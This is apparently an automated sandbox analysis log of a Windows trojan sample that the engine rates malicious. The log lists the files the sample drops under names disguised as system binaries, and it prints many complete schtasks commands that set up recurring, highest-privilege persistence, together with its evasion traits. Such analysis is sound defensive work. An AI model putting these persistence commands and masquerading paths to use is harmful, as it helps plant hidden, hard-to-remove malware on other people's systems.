Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 38_2_00007FFD9B883565	38_2_00007FFD9B883565

Sample file is different than original file name gathered from version info

Source: 13ZNp2xvRU.exe, 00000000.00000000.1694422504.0000000000762000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs 13ZNp2xvRU.exe
Source: 13ZNp2xvRU.exe, 00000000.00000002.1730495375.000000001BD32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs 13ZNp2xvRU.exe
Source: 13ZNp2xvRU.exe	Binary or memory string: OriginalFilenamelibcrypto$ vs 13ZNp2xvRU.exe

Uses 32bit PE files

Source: 13ZNp2xvRU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 13ZNp2xvRU.exe, hNssXtdlcy8emRTei3J.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13ZNp2xvRU.exe, hNssXtdlcy8emRTei3J.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13ZNp2xvRU.exe, q6q31BtcVXevoZcYS3K.cs	Cryptographic APIs: 'TransformBlock'
Source: 13ZNp2xvRU.exe, q6q31BtcVXevoZcYS3K.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@33/30@0/1

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe

File created: C:\Program Files (x86)\google\Update\RRVGfHJzvQMYfWe.exe

Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\766f4844838c3bc63e3f2bcd7b909849dd6cbe33

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: unknown	Process created: C:\Users\user\Desktop\13ZNp2xvRU.exe "C:\Users\user\Desktop\13ZNp2xvRU.exe"
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RRVGfHJzvQMYfWe.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWe" /sc ONLOGON /tr "'C:\Recovery\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 7 /tr "'C:\Recovery\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\Registry.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\twain_32\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\smartscreen.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWe" /sc ONLOGON /tr "'C:\Recovery\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\RRVGfHJzvQMYfWe.exe'" /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWe" /sc ONLOGON /tr "'C:\Program Files (x86)\java\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RRVGfHJzvQMYfWeR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\RRVGfHJzvQMYfWe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Panther\setup.exe\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\setup.exe\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe "C:\Program Files (x86)\google\Update\RRVGfHJzvQMYfWe.exe"
Source: unknown	Process created: C:\Windows\Panther\setup.exe\fontdrvhost.exe C:\Windows\Panther\setup.exe\fontdrvhost.exe
Source: unknown	Process created: C:\Windows\Panther\setup.exe\fontdrvhost.exe C:\Windows\Panther\setup.exe\fontdrvhost.exe
Source: unknown	Process created: C:\Windows\twain_32\Registry.exe C:\Windows\twain_32\Registry.exe
Source: unknown	Process created: C:\Windows\twain_32\Registry.exe C:\Windows\twain_32\Registry.exe
Source: unknown	Process created: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe "C:\Program Files (x86)\java\RRVGfHJzvQMYfWe.exe"
Source: unknown	Process created: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe "C:\Program Files (x86)\java\RRVGfHJzvQMYfWe.exe"
Source: unknown	Process created: C:\ProgramData\smartscreen.exe "C:\Users\All Users\smartscreen.exe"
Source: unknown	Process created: C:\ProgramData\smartscreen.exe "C:\Users\All Users\smartscreen.exe"
Source: unknown	Process created: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe
Source: unknown	Process created: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f	Jump to behavior

Source: 13ZNp2xvRU.exe, HGhn2OuaYhviLuGlTpE.cs	.Net Code: OZiQZOSWDp System.AppDomain.Load(byte[])
Source: 13ZNp2xvRU.exe, HGhn2OuaYhviLuGlTpE.cs	.Net Code: OZiQZOSWDp System.Reflection.Assembly.Load(byte[])
Source: 13ZNp2xvRU.exe, HGhn2OuaYhviLuGlTpE.cs	.Net Code: OZiQZOSWDp

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Code function: 0_2_00007FFD9B892C18 pushad ; retf	0_2_00007FFD9B892C81
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Code function: 0_2_00007FFD9B892C58 pushad ; retf	0_2_00007FFD9B892C81
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Code function: 0_2_00007FFD9B892C78 pushad ; retf	0_2_00007FFD9B892C81
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Code function: 0_2_00007FFD9B892C68 pushad ; retf	0_2_00007FFD9B892C81
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Code function: 28_2_00007FFD9B892C04 pushad ; retf	28_2_00007FFD9B892C81
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 29_2_00007FFD9B892C04 pushad ; retf	29_2_00007FFD9B892C81
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 30_2_00007FFD9B8B2C18 pushad ; retf	30_2_00007FFD9B8B2C81
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 30_2_00007FFD9B8B2C58 pushad ; retf	30_2_00007FFD9B8B2C81
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 30_2_00007FFD9B8B2C78 pushad ; retf	30_2_00007FFD9B8B2C81
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 30_2_00007FFD9B8B2C68 pushad ; retf	30_2_00007FFD9B8B2C81
Source: C:\Windows\twain_32\Registry.exe	Code function: 31_2_00007FFD9B892C04 pushad ; retf	31_2_00007FFD9B892C81
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B872C18 pushad ; retf	32_2_00007FFD9B872C81
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B872C58 pushad ; retf	32_2_00007FFD9B872C81
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B872C78 pushad ; retf	32_2_00007FFD9B872C81
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B872C68 pushad ; retf	32_2_00007FFD9B872C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 33_2_00007FFD9B882C18 pushad ; retf	33_2_00007FFD9B882C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 33_2_00007FFD9B882C58 pushad ; retf	33_2_00007FFD9B882C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 33_2_00007FFD9B882C78 pushad ; retf	33_2_00007FFD9B882C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 33_2_00007FFD9B882C68 pushad ; retf	33_2_00007FFD9B882C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 34_2_00007FFD9B892C04 pushad ; retf	34_2_00007FFD9B892C81
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 34_2_00007FFD9B890028 pushad ; iretd	34_2_00007FFD9B890029
Source: C:\ProgramData\smartscreen.exe	Code function: 35_2_00007FFD9B892C04 pushad ; retf	35_2_00007FFD9B892C81
Source: C:\ProgramData\smartscreen.exe	Code function: 36_2_00007FFD9B8A2C18 pushad ; retf	36_2_00007FFD9B8A2C81
Source: C:\ProgramData\smartscreen.exe	Code function: 36_2_00007FFD9B8A2C58 pushad ; retf	36_2_00007FFD9B8A2C81
Source: C:\ProgramData\smartscreen.exe	Code function: 36_2_00007FFD9B8A2C78 pushad ; retf	36_2_00007FFD9B8A2C81
Source: C:\ProgramData\smartscreen.exe	Code function: 36_2_00007FFD9B8A2C68 pushad ; retf	36_2_00007FFD9B8A2C81
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B872C04 pushad ; retf	37_2_00007FFD9B872C81
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 38_2_00007FFD9B882C04 pushad ; retf	38_2_00007FFD9B882C81

Source: unknown	Executable created and started: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe
Source: unknown	Executable created and started: C:\Windows\Panther\setup.exe\fontdrvhost.exe
Source: unknown	Executable created and started: C:\Windows\twain_32\Registry.exe

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Recovery\RRVGfHJzvQMYfWe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\twain_32\Registry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\ProgramData\smartscreen.exe	Jump to dropped file

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Memory allocated: 1AB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Memory allocated: F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Memory allocated: 8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Memory allocated: 1A480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Memory allocated: 14C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Memory allocated: 1B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	Memory allocated: 1280000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\Registry.exe	Memory allocated: 1AD90000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\Registry.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\Registry.exe	Memory allocated: 1AC80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Memory allocated: 11F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Memory allocated: 1ABC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Memory allocated: 830000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Memory allocated: 1A4E0000 memory reserve \| memory write watch
Source: C:\ProgramData\smartscreen.exe	Memory allocated: 680000 memory reserve \| memory write watch
Source: C:\ProgramData\smartscreen.exe	Memory allocated: 1A380000 memory reserve \| memory write watch
Source: C:\ProgramData\smartscreen.exe	Memory allocated: 1280000 memory reserve \| memory write watch
Source: C:\ProgramData\smartscreen.exe	Memory allocated: 1AD40000 memory reserve \| memory write watch
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Memory allocated: 2490000 memory reserve \| memory write watch
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Memory allocated: 1A680000 memory reserve \| memory write watch
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Memory allocated: A80000 memory reserve \| memory write watch
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Memory allocated: 1A890000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 598934	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\Registry.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Window / User API: threadDelayed 1126	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Window / User API: threadDelayed 1037	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Window / User API: threadDelayed 1409	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Window / User API: threadDelayed 2080	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Window / User API: threadDelayed 647	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe	Window / User API: threadDelayed 361
Source: C:\Windows\twain_32\Registry.exe	Window / User API: threadDelayed 364
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Window / User API: threadDelayed 362
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Window / User API: threadDelayed 370
Source: C:\ProgramData\smartscreen.exe	Window / User API: threadDelayed 367
Source: C:\ProgramData\smartscreen.exe	Window / User API: threadDelayed 367
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Window / User API: threadDelayed 369
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Window / User API: threadDelayed 364

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe TID: 6232	Thread sleep count: 1126 > 30	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe TID: 6232	Thread sleep count: 1037 > 30	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe TID: 6688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 4080	Thread sleep count: 1409 > 30	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 2996	Thread sleep count: 2080 > 30	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -599047s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -598934s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 7576	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 5216	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe TID: 5844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe TID: 7216	Thread sleep count: 647 > 30	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe TID: 7308	Thread sleep count: 367 > 30	Jump to behavior
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\twain_32\Registry.exe TID: 7352	Thread sleep count: 361 > 30
Source: C:\Windows\twain_32\Registry.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\Registry.exe TID: 7492	Thread sleep count: 364 > 30
Source: C:\Windows\twain_32\Registry.exe TID: 7388	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe TID: 7604	Thread sleep count: 362 > 30
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe TID: 7392	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe TID: 7632	Thread sleep count: 370 > 30
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\smartscreen.exe TID: 7716	Thread sleep count: 367 > 30
Source: C:\ProgramData\smartscreen.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\smartscreen.exe TID: 7512	Thread sleep count: 367 > 30
Source: C:\ProgramData\smartscreen.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s
